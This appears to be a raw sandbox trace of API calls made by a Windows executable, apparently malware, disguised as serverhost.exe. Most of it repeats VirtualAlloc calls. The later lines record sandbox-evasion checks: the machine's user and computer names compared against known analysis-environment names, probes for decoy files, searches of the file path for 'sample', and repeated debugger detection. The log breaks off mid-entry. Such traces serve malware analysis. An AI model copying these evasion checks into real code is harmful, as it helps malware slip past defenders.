(lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.856] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.857] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.858] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.859] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.860] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.861] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.862] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.863] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.005] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0057.010] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0057.018] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0057.018] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0057.018] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0057.018] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0057.019] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0057.019] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0057.019] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0057.167] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0057.167] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0057.168] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0057.168] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0057.168] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0057.168] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0057.168] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0057.168] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0057.168] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0057.168] GetUserNameA (in: lpBuffer=0x12fb5c, pcbBuffer=0x12f958 | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x12f958) returned 1 [0057.172] GetComputerNameA (in: lpBuffer=0x12fa5c, nSize=0x12f958 | out: lpBuffer="F71GWAT", nSize=0x12f958) returned 1 [0057.172] GetComputerNameExA (in: NameType=0x1, lpBuffer=0x12f95c, nSize=0x12f958 | out: lpBuffer="F71gwat", nSize=0x12f958) returned 1 [0057.172] lstrcmpA (lpString1="F71GWAT", lpString2="TEQUILABOOMBOOM") returned -1 [0057.173] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="Wilbert") returned -1 [0057.173] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0057.173] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0057.173] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John Doe") returned -1 [0057.173] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John") returned -1 [0057.174] CreateFileA (lpFileName="C:\\email.doc" (normalized: "c:\\email.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0057.174] CloseHandle (hObject=0xffffffff) returned 0 [0057.174] CreateFileA (lpFileName="C:\\a\\foobar.bmp" (normalized: "c:\\a\\foobar.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0057.174] CloseHandle (hObject=0xffffffff) returned 0 [0057.174] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0057.174] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x12fb68, nSize=0x103 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0057.174] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpSrch="sample") returned 0x0 [0057.174] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpSrch="mlwr_smpl") returned 0x0 [0057.174] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpSrch="artifact.exe") returned 0x0 [0057.174] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.174] IsDebuggerPresent () returned 0 [0057.174] IsDebuggerPresent () returned 0 [0057.174] IsDebuggerPresent () returned 0 [0057.174] IsDebuggerPresent () returned 0 [0057.174] IsDebuggerPresent () returned 0 [0057.174] IsDebuggerPresent () returned 0 [0057.174] IsDebuggerPresent () returned 0 [0057.174] IsDebuggerPresent () returned 0 [0057.174] IsDebuggerPresent () returned 0 [0057.174] IsDebuggerPresent () returned 0 [0057.174] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.175] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] 